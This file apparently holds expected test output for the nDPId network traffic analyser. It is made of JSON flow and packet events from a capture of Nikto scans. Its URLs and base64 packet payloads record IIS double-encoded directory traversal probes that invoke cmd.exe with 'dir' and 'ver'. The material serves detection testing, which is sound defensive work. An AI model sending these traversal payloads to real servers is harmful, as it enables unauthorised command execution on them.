{"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003294)"}} +01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003294)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1576420277893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1576420277893,"pkt":"AAAAAAAAAAAAAAAACABFAADvSZpAAEAG8mx\/AAABfwAAAcdqH5B\/BnDaXNCp24AYAED+4wAAAQEICp1m\/62dZv+tR0VUIC9jZ2ktYmluLy4uJTI1NWMuLiUyNTVjLi4lMjU1Y3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk1KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01100{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003295)"}} +01100{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003295)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277895,"pkt":"AAAAAAAAAAAAAAAACABFAADqfTRAAEAGvtd\/AAABfwAAAcdsH5BhnER0\/MAlIYAYAED+3gAAAQEICp1m\/6+dZv+vR0VUIC9paXNhZG1wd2QvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003296)"}} +01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003296)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":258,"pkt_l4_len":224,"thread_ts_msec":1576420277896,"pkt":"AAAAAAAAAAAAAAAACABFAAD0gMpAAEAGuzd\/AAABfwAAAcduH5Bs5rmLXk\/vk4AYAED+6AAAAQEICp1m\/7CdZv+wR0VUIC9tc2FkYy8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01105{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003297)"}} +01105{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003297)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277898,"pkt":"AAAAAAAAAAAAAAAACABFAADwDYtAAEAGLnt\/AAABfwAAAcdwH5DXOjTMIaH3HYAYAED+5AAAAQEICp1m\/7GdZv+xR0VUIC9wYnNlcnZlci8uLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003298)"}} +01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003298)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_packet_id":1,"flow_last_seen":1576420277899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277899,"pkt":"AAAAAAAAAAAAAAAACABFAADkYvBAAEAG2SF\/AAABfwAAAcdyH5AooFut2XrcJYAYAED+2AAAAQEICp1m\/7OdZv+zR0VUIC9ycGMvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01089{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003299)"}} +01089{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003299)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_packet_id":1,"flow_last_seen":1576420277901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277901,"pkt":"AAAAAAAAAAAAAAAACABFAADogDVAAEAGu9h\/AAABfwAAAcd0H5COI7lxOfsaCoAYAED+3AAAAQEICp1m\/7WdZv+1R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003300)"}} +01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003300)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_packet_id":1,"flow_last_seen":1576420277902,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277902,"pkt":"AAAAAAAAAAAAAAAACABFAADos7FAAEAGiFx\/AAABfwAAAcd2H5DBqortDeq7IYAYAED+3AAAAQEICp1m\/7adZv+2R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYyt2ZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+ver","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003301)"}} +01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+ver","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003301)"}} 